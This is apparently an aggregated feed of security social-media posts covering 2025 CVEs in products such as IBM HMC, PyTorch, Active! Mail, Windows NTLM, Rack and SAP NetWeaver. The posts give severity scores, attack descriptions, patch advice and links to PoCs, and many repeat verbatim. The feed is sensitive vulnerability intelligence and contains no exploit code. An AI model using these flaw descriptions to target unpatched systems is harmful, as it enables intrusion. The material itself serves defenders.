sev:HIGH 8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPCM).This issue affects HPE Performance Cluster Manager (HPCM): through 1.12.

https://nvd.nist.gov/vuln/detail/CVE-2025-27086

Multiple vulnerabilities reported in IBM Hardware Management Console

IBM has patched multiple security vulnerabilities in its Power Hardware Management Console (HMC), including a critical flaw (CVE-2025-1950, CVSS 9.3) that allows local users to execute commands with elevated privileges due to improper validation.

**First, make sure your IBM Hardware Management Console (HMC) is isolated and accessible only from trusted networks and trusted personnel. Also check whether you are running vulnerable versions (V10.2.1030.0 and V10.3.1050.0). If you are, plan a patch cycle, because any isolation will eventually be breached.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/multiple-vulnerabilities-reported-in-ibm-hardware-management-console-n-n-l-r-j/gD2P6Ple2L

Heads-up if you or your target run IBM Hardware Management Console.

https://www.ibm.com/support/pages/node/7231507

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

https://nvd.nist.gov/vuln/detail/CVE-2025-1950

https://www.ibm.com/support/pages/node/7231389

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

https://nvd.nist.gov/vuln/detail/CVE-2025-1951

Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

https://nvd.nist.gov/vuln/detail/CVE-2025-43970

https://nvd.nist.gov/vuln/detail/CVE-2025-43971

https://nvd.nist.gov/vuln/detail/CVE-2025-43972

https://nvd.nist.gov/vuln/detail/CVE-2025-43973

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

https://nvd.nist.gov/vuln/detail/CVE-2025-43970

https://nvd.nist.gov/vuln/detail/CVE-2025-43971

https://nvd.nist.gov/vuln/detail/CVE-2025-43972

https://nvd.nist.gov/vuln/detail/CVE-2025-43973

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

https://nvd.nist.gov/vuln/detail/CVE-2025-43970

https://nvd.nist.gov/vuln/detail/CVE-2025-43971

https://nvd.nist.gov/vuln/detail/CVE-2025-43972

https://nvd.nist.gov/vuln/detail/CVE-2025-43973

Preauth code exec in an IAM platform sounds fun.

https://bookstack.soffid.com/books/security-advisories/page/cve-2025-32408

sev:HIGH 8.5 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

In Soffid Console 3.5.38 before 3.5.39, necessary checks were not applied to some Java objects. A malicious agent could possibly execute arbitrary code in the Sync Server and compromise security.

https://www.cvedetails.com/cve/CVE-2025-32408/

This is an interesting vuln in Sonos API.

https://github.com/larlarua/vulnerability-reports/blob/main/CVE-2025-43916/detail.md

sev:LOW 3.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N

Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is used, accepts a redirect_uri containing userinfo in the authority component, which is not consistent with RFC 6819 section 5.2.3.5. An authorization code may be sent to an attacker-controlled destination. This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

https://nvd.nist.gov/vuln/detail/CVE-2025-43916

What's interesting to me is in the description:

This might have further implications in conjunction with "Decompiling the app revealed a hardcoded secret."

A quick search for that string only returned this CVE so I don't know if it's a pending CVE or what but it might be worth watching for if you play around with Sonos things.

I don't know what systems use GoBGP, but if it's you or your targets, you might be interested in these. It appears they were fixed in version 3.35.0 which released on 28 February.

https://nvd.nist.gov/vuln/detail/CVE-2025-43970

https://nvd.nist.gov/vuln/detail/CVE-2025-43971

https://nvd.nist.gov/vuln/detail/CVE-2025-43972

https://nvd.nist.gov/vuln/detail/CVE-2025-43973

CVE published for that ssl dot com oopsie.

https://bugzilla.mozilla.org/show_bug.cgi?id=1961406

SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, processes certificate requests such that a trusted TLS certificate may be issued for the domain name of a requester's email address, even when the requester does not otherwise establish administrative control of that domain.

https://nvd.nist.gov/vuln/detail/CVE-2025-43918

What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT ones mixed in?

https://github.com/02Tn/vul/issues

https://nvd.nist.gov/vuln/detail/CVE-2025-3802

https://nvd.nist.gov/vuln/detail/CVE-2025-3803

What's that, @Dio9sys and @da_667 ? You want more Tenda? How about a couple sev:CRIT ones mixed in?

https://github.com/02Tn/vul/issues

https://nvd.nist.gov/vuln/detail/CVE-2025-3802

https://nvd.nist.gov/vuln/detail/CVE-2025-3803

Critical remote code execution flaw reported in PyTorch Framework

The PyTorch machine learning framework contains a critical Remote Code Execution vulnerability (CVE-2025-32434, CVSS 9.3) affecting versions up to 2.5.1, which allows attackers to bypass the `weights_only=True` protection parameter when loading models, potentially executing arbitrary code.

**If you are using PyTorch, especially for loading third party potentially unsafe models, update your PyTorch to the latest version. Alternatively, find other ways to load models because weights_only=True parameter in the torch.load() is not safe now.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-remote-code-execution-flaw-reported-in-pytorch-framework-q-d-g-r-7/gD2P6Ple2L

Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found https://thecyberexpress.com/pytorch-vulnerability-cve-2025-32434/ #PyTorchVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202532434 #MLsecurity #CyberNews #AImodels

Urgent security alert for Active! mail users! A critical vulnerability (CVE-2025-42599) was exploited in zero-day attacks for over 8 months. Find out if you're affected and what steps to take now. Don't wait!

#SecurityLand #BreachBreakdown #ActiveMail #Security #ZeroDay #Cybersecurity #Vulnerability

https://www.security.land/critical-active-mail-vulnerability-exploited-in-zero-day-attacks-for-over-8-months/

Active! Mail remote code execution flaw actively exploited

Japanese web-based email client Active! Mail contains a critical stack-based buffer overflow vulnerability (CVE-2025-42599, CVSS 9.8) that allows unauthenticated attackers to execute arbitrary code remotely. The flaw is currently being actively exploited against Japanese organizations impacting approximately 11 million accounts, prompting Qualitia to release version 6.60.06008562 as an urgent security patch.

**If you are running Active! Mail webmail based service, disable it immediately and start patching. Because hackers are actively attacking it. You can try to mitigate the issue by blocking multipart/form-data headers, but that's not really a fix. Better to disable it fully, patch, then reactivate the service.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/active-mail-remote-code-execution-flaw-actively-exploited-u-h-r-8-r/gD2P6Ple2L

Windows – CVE-2025-24054 : cet exploit NTLM est utilisé pour cibler entreprises et gouvernements https://www.it-connect.fr/windows-cve-2025-24054-cet-exploit-ntlm-est-utilise-pour-cibler-entreprises-et-gouvernements/ #ActuCybersécurité #Cybersécurité #Phishing #Windows #NTLM

There is quite a bit of buzz related to CVE-2025-24054 which covers attackers causing victims to leak NTLM hashes if they open certain files or view certain directories. In short, this forces victims running Windows to make a connection to an attacker controlled SMB share.

Note: A patch was provided by Microsoft on March 11.

If you prevent SMB traffic from leaving your networks then you don't have to worry about this unless the attacker has already setup shop in your network. Like, patch anyway but, IMO, it would be a better use of your time to ensure that outbound SMB is blocked first. Don't forget to account for mobile devices that are off-network.

Reference:
Check Point - CVE-2025-24054, NTLM Exploit in the Wild
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/

#Security #Windows

Man, what a week! 😅 Those supposedly "harmless" clicks... seriously, sometimes it's enough to make you wanna weep.

Sure, the big, flashy exploits grab the headlines. But honestly? More often than not, it's a simple dodgy config or a user clicking way too fast that really opens the door.

Working as a pentester, I see this play out constantly: those little slip-ups are frequently the most dangerous ones. It’s why you *definitely* need to keep CVE-2025-24054 on your radar and get it patched ASAP!

And folks, seriously – *never* blindly run random Python code someone just emails you out of the blue! (Yeah, we see you, potential state-sponsored actors 😉).

What about you? Got any war stories about these seemingly "small" attack vectors? Let's hear 'em! Share your experiences below. 👇

#Cybersecurity #Pentesting #OffensiveSecurity

Heads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.

This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.

The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.

What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.

Full breakdown from Check Point here:
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/

#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow

Critical authentication flaw reported in Lantronix Xport

The Lantronix Xport devices contain a critical authentication bypass vulnerability (CVE-2025-2567, CVSS 9.8) affecting versions 6.5.0.7 through 7.0.0.3 that allows remote attackers to access the configuration interface without credentials, potentially enabling disruption of critical infrastructure and creating safety hazards in fuel operations.

**If you are using Lantronix Xport devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-flaw-reported-in-lantronix-xport-c-7-8-8-g/gD2P6Ple2L

Infinite loop DoS in Amazon dot IonDotnet.

https://aws.amazon.com/security/security-bulletins/AWS-2025-009/

sev:MED 5.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

A vulnerability classified as critical was found in ZeroWdd/code-projects studentmanager 1.0. This vulnerability affects unknown code of the file /getTeacherList. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

https://nvd.nist.gov/vuln/detail/CVE-2025-3587

Lulz. Remember the brouhaha about the "vulnerability" in WinRAR for not preserving the Mark-of-the-Web when extracting files from downloaded archives? Well, guess what WinZIP does.

"CVE-2025-33028 - WinZip Mark-of-the-Web Bypass Vulnerability":

https://github.com/EnisAksu/Argonis/blob/main/CVEs/CVE-2025-33028%20%28WinZip%29/CVE-2025-33028.md

Critical flaw reported in InstaWP Connect WordPress plugin
The InstaWP Connect WordPress plugin contains a critical Local File Inclusion vulnerability (CVE-2025-2636, CVSS 9.8) in versions up to 0.1.0.85 that allows unauthenticated attackers to execute arbitrary PHP files, potentially leading to complete website compromise. Administrators should update to version 0.1.0.86 or later.

**If you have installed InstaWP Connect WordPress plugin, update it NOW. The update is trivial, and it's much easier to update a plugin and sleep easy than to worry whether you can be hacked.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-flaw-reported-in-instawp-connect-wordpress-plugin-0-x-2-p-8/gD2P6Ple2L

Palo Alto updated this vulnerability yesterday.

CVE-2025-0120 GlobalProtect App: Local Privilege Escalation (PE) Vulnerability (moderate) https://security.paloaltonetworks.com/CVE-2025-0120 #PaloAlto #cybersecurity #infosec

Go hack more AI shit.

Go hack more AI shit.

https://www.zscaler.com/blogs/security-research/cve-2025-3248-rce-vulnerability-langflow

CVE-2025-3248: RCE vulnerability in Langflow – Source: securityboulevard.com https://ciso2ciso.com/cve-2025-3248-rce-vulnerability-in-langflow-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard

Glad we got this out of the way.

PC World: Windows 11’s crucial new ‘inetpub’ folder, created to patch CVE-2025-21204, is laughably easy to hack https://www.pcworld.com/article/2761626/windows-11s-crucial-new-inetpub-folder-is-laughably-easy-to-hack.html @pcworld #cybersecurity #infosec #Microsoft #Windows

@GossiTheDog Are you sure the writeup for CVE-2025-21204 you linked is good? It seems superficially reasonable but looks very confusing on closer inspection, in a way that suggests it may be AI-generated.

But I'm not that confident in our assessment here, and will probably trust your judgement if you say it looks reasonable - we don't do too much Windows stuff

My recent linking a CVE-2025-21204 PoC is in fact BS. Deeper inspection of the PoC demonstrated no connection between the code and C:\inetpub, and what's more, the "evidence" didn't show privilege escalation.

I had concerns this was LLM crap, and I should have trusted those instincts.

I've written about how Microsoft's fix for a symlink vulnerability introduces another symlink vulnerability, where all users (including non-admins) can stop all future Windows OS security patches https://doublepulsar.com/microsofts-patch-for-cve-2025-21204-symlink-vulnerability-introduces-another-symlink-vulnerability-9ea085537741

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) http://www.kitploit.com/2025/04/ghost-route-ghost-route-detects-if-next.html

ASUS releases fix for AMI bug that lets hackers brick servers

ASUS has released security updates to address CVE-2024-54085, a maximum severity flaw that could allow attackers to hijack and potentially brick...

🔗️ [Bleepingcomputer] https://link.is.it/ky8mNl

Fortinet: IngressNightmare: Understanding CVE‑2025‑1974 in Kubernetes Ingress-NGINX https://www.fortinet.com/blog/threat-research/ingressnightmare-understanding-cve-2025-1974-in-kubernetes-ingress-nginx @fortinet #cybersecurity #Infosec #Kubernetes

CVE-2025-27840: How a Tiny ESP32 Chip Could Crack Open Bitcoin Wallets Worldwide https://securityonline.info/cve-2025-27840-how-a-tiny-esp32-chip-could-crack-open-bitcoin-wallets-worldwide/

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

Rack Ruby vulnerability could reveal secrets to attackers (CVE-2025-27610) https://www.helpnetsecurity.com/2025/04/25/rack-ruby-vulnerability-could-reveal-secrets-to-attackers-cve-2025-27610/ #webapplicationsecurity #securityupdate #vulnerability #Don'tmiss #Hotstuff #OPSWAT #News #Ruby

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

Updated #curl bug bounty stats, six years in:

520 reports
78 confirmed security vulnerabilities
104 "informative" reports, bugs that weren't vulnerabilities
11 marked as "AI slop"

The rest were just different kinds of not applicable. Some more crazy than others.

The latest confirmed curl vulnerability (CVE-2025-0725) was reported 90 days ago.

There is currently zero issues in our queue.

https://curl.se/docs/bugbounty.html

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

Rack Ruby has some neat bugs. Not my favorite framework by far but it's popular (for some reason). The bugs are neat though.

https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

#ruby #cve

OPSWAT: Security Analysis of Rack Ruby Framework: CVE-2025-25184, CVE-2025-27111, and CVE-2025-27610 https://www.opswat.com/blog/security-analysis-of-rack-ruby-framework-cve-2025-25184-cve-2025-27111-and-cve-2025-27610

More:

The Hacker News: Researchers Identify Rack::Static Vulnerability Enabling Data Breaches in Ruby Servers https://thehackernews.com/2025/04/researchers-identify-rackstatic.html @thehackernews #cybersecurity #Infosec #Ruby

Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html #news #IT

JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html

More:

The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks – Source:thehackernews.com https://ciso2ciso.com/dslogdrat-malware-deployed-via-ivanti-ics-zero-day-cve-2025-0282-in-japan-attacks-sourcethehackernews-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #TheHackerNews #DslogdRAT

Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html #news #IT

JPCERT/CC Eyes: DslogdRAT Malware Installed in Ivanti Connect Secure https://blogs.jpcert.or.jp/en/2025/04/dslogdrat.html

More:

The Hacker News: DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html @thehackernews #cybersecurity #Infosec #Ivanti #zeroday #malware

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html

DslogdRAT Malware Deployed via Ivanti ICS Zero-Day CVE-2025-0282 in Japan Attacks https://thehackernews.com/2025/04/dslogdrat-malware-deployed-via-ivanti.html

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet

Nice reports critical flaw in Linear eMerge E3

Critical vulnerability CVE-2024-9441 (CVSS 9.8) in Nice's Linear eMerge E3 access control system allows unauthenticated remote attackers to execute arbitrary OS commands through the login_id parameter in the forgot_password functionality. All versions through 1.00-07 affected and no patch is currently available.

**If you are using Nice Linear eMerge E3 access control system, be aware that it's vulnerable. Make sure it's isolated from the internet and accessible only from trusted networks, and reach out to the vendor for patch timing.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/nice-reports-critical-flaw-in-linear-emerge-e3-8-q-a-y-1/gD2P6Ple2L

Some nifty n-day vuln analysis from the team (Calum Hutton) this week: Citrix NetScaler Console CVE-2024-6235 allows an unauthenticated attacker to obtain an admin-level session ID from an internal API and use this to create other admin users on the system.

https://attackerkb.com/assessments/3bf5c123-41fa-47c5-9eb1-d139317061b8

Some vulnerabilities aren’t exploited until years after disclosure. That means patching only what’s “hot” right now leaves a dangerous blindspot. Attackers know this—and they’re patient.

Example:

CVE-2018-0171 (Cisco IOS XE RCE) is a Black Swan. Dormant, then suddenly targeted.

CVE-2020-5902 (F5 BIG-IP TMUI RCE) is Utility—frequently targeted, but with lulls that lull defenders into complacency.
4/7

Schneider Electric reports critical flaw in Wiser Home Controller WHC-5918A

The Schneider Electric Wiser Home Controller WHC-5918A contains a critical security vulnerability (CVE-2024-6407, CVSS 9.8) allowing attackers to extract sensitive credentials by sending specially crafted messages. Schneider is recommending complete replacement of the discontinued device with their newer C-Bus Home Controller model as no security patches will be released.

**If you are using Schneider Electric Wiser Home Controller WHC-5918A devices, be aware that they are critically vulnerable and won't be patched. As usual, make sure they are isolated from the internet and accessible only from trusted networks. Then make a full risk assessment and consider replacing them with supported and secured devices.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/schneider-electric-reports-critical-flaw-in-wiser-home-controller-whc-5918a-0-k-c-4-0/gD2P6Ple2L

CVE-2022-42475, CVE-2023-27997, CVE-2024-21762, and CVE-2024-48887, all critical.

Cyble IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit https://cyble.com/blog/it-vulnerability-report-fortinet-devices-vulnerable-to-exploit/ #cybersecurity #infosec #Fortinet

Wolves in the Repository: A Software Engineering Analysis of the XZ Utils Supply Chain Attack

Piotr Przymus (Nicolaus Copernicus University in Torun, Poland), Thomas Durieux (TU Delft & Endor Labs, The Netherlands)
https://arxiv.org/abs/2504.17473 https://arxiv.org/pdf/2504.17473 https://arxiv.org/html/2504.17473

arXiv:2504.17473v1 Announce Type: new
Abstract: The digital economy runs on Open Source Software (OSS), with an estimated 90\% of modern applications containing open-source components. While this widespread adoption has revolutionized software development, it has also created critical security vulnerabilities, particularly in essential but under-resourced projects. This paper examines a sophisticated attack on the XZ Utils project (CVE-2024-3094), where attackers exploited not just code, but the entire open-source development process to inject a backdoor into a fundamental Linux compression library. Our analysis reveals a new breed of supply chain attack that manipulates software engineering practices themselves -- from community management to CI/CD configurations -- to establish legitimacy and maintain long-term control. Through a comprehensive examination of GitHub events and development artifacts, we reconstruct the attack timeline, analyze the evolution of attacker tactics. Our findings demonstrate how attackers leveraged seemingly beneficial contributions to project infrastructure and maintenance to bypass traditional security measures. This work extends beyond traditional security analysis by examining how software engineering practices themselves can be weaponized, offering insights for protecting the open-source ecosystem.

#toXiv_bot_toot

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 http://www.kitploit.com/2025/04/text4shell-exploit-custom-python-based.html

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday

Spring Security CVE-2025-22234 on spring-security-crypto

https://www.herodevs.com/vulnerability-directory/cve-2025-22234

Discussions: https://discu.eu/q/https://www.herodevs.com/vulnerability-directory/cve-2025-22234

#java #programming

Spring Security CVE-2025-22234 on spring-security-crypto

https://www.herodevs.com/vulnerability-directory/cve-2025-22234

Discussions: https://discu.eu/q/https://www.herodevs.com/vulnerability-directory/cve-2025-22234

#java #programming

Spring Security CVE-2025-22234 Introduces Username Enumeration Vector https://www.herodevs.com/vulnerability-directory/cve-2025-22234

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L

This SQLi in Centreon Web is from a month ago but the CVE was published today.

https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55571-centreon-web-high-severity-4496

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-3872

Redis DoS.

https://github.com/redis/redis/security/advisories/GHSA-r67f-p999-2gff

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

